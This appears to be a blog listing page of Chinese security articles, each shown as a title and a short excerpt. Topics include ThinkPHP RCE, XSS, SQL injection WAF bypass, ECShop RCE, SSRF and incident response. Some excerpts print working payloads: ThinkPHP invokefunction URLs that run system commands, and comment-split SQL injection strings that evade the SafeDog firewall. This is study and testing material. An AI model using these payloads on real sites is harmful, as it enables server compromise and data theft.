thinkphp 5.0-5.1 命令执行流水账记录

thinkphp 5.0-5.1 命令执行流水账记录
0x00 没有开头 0x01 文章参考 0x00 没有开头 环境部署安排一下  bt一键部署:配合泛解析域名,轻松部署环境 漏洞复现 qq.com为vuln host http://qq.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]=id //5.1 http://qq.com/?s=index/\think\Request/input&filter=phpinfo&data=1 http://qq.com/?s=index/\think\template...

黑客入侵应急分析手工排查

黑客入侵应急分析手工排查
Author: [email protected]猎户攻防实验室 行文仓促,不足之处,还望大牛指正。 1 事件分类 常见的安全事件: Web入侵:挂马、篡改、Webshell 系统入侵:系统异常、RDP爆破、SSH爆破、主机漏洞 病毒木马:远控、后门、勒索软件 信息泄漏:脱裤、数据库登录(弱口令) 网络流量:频繁发包、批量请求、DDOS攻击 2 排查思路 一个常规的入侵事件后的系统排查思路: 文件分析 ​a) 文件日期、新增文件、可疑/异常文件、...

记一次Java反序列化漏洞的发现和修复

记一次Java反序列化漏洞的发现和修复
作者:[email protected]勾陈安全 0x00 背景简介 本文是自己对一次反序列化漏洞的发现和修复过程,如有错误请斧正,大神请轻喷。 目标应用系统是典型的CS模式。 客户端是需要安装的windows桌面程序,但是它是大部分内容都是基于Java开发(安装目录有很多Jar包)。 服务端是基于Jboss开发。 客户端和服务端之间的通信流量是序列化了的数据流量。客户端接收和解析数据流量的模式和服务端一样,也是通过http服务,它在本地...

XSS攻击及防御

XSS攻击及防御
XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。 XSS攻击 XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在X...

密码保护:bypass最新版安全狗

密码保护:bypass最新版安全狗
环境 系统:win7x64+phpstudy+安全狗apache版 v4.0 站点:sqli-labs bypass Mysql 注释符:# , -- , /*...*/ Mysql 空白字符:%09,%0a,%0b,%0c,%0d,%20,%a0 绕过 and 1=1 首先判断是否有注入点: 正常情况:http://192.11.22.55/sqli/Less-1/?id=1' and 1=1 %23 (安全狗拦截) 把and 1=1拆分: http://192.11.22.55/sqli/Less-1/?id=1' and %23 (安全狗不拦截) 所以要把and和1=1当成两部分,在它们之间进行...

ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用

ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用
2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 —— ECShop全系列版本远程代码执行高危漏洞分析 本文我们将使用 VulnSpy 的在线 ECSHOP 环境对漏洞进行复现和利用演示。 点击右上方 STA...

SQL INJECTION BYPASS CHEATSHEET

SQL INJECTION BYPASS CHEATSHEET
SQL INJECTION SQL Injection is one of the many web attack types, an attacker can send request with malicious SQL statements then executed by database server. A successful SQL injection exploit Attacker can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), read/wri...

邮件伪造漏洞原理与修复

邮件伪造漏洞原理与修复
背景 邮箱伪造技术,可被用来做钓鱼攻击。 即伪造管理员或者IT运维部等邮箱发邮件,获取信任使对方打开附带的木马文件或者回复想要获取的敏感资料等。在APT攻击中常用手段之一,结合office、flash漏洞,进行水坑攻击。 首先,如何验证邮件伪造? 解决对邮件伪造的疑惑,这里有一个在线的测试网站:https://emkei.cz/ 。可以尝试使用这个网站测试发送一封邮件给自己。例如:检测说a.com存在邮件伪造漏洞。那...

Fiddler实现IOS手机抓取https报文

Fiddler实现IOS手机抓取https报文
如何设置代理访问内网进而抓取手机的Https报文进行分析定位。 准备工作: 1、PC上连接好VPN 2、管理员方式打开Fiddler工具 开搞: 一、设置Fiddler 1、打开Tools->Options->HTTPS窗口 圈起来的地方都勾上! Ps:"Decrpt HTTPS traffic" 表示Fiddler就可以截获HTTPS请求;   2、打开Tools->Options->Connections窗口 圈起来的地方都勾上! Ps:"Allow remote computers to connect"   表示...

SSRF 学习笔记

SSRF 学习笔记
漏洞简介 SSRF,Server-Side Request Forgery,服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作过滤和限制。 漏洞代码 curl_exec() 版 function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); ...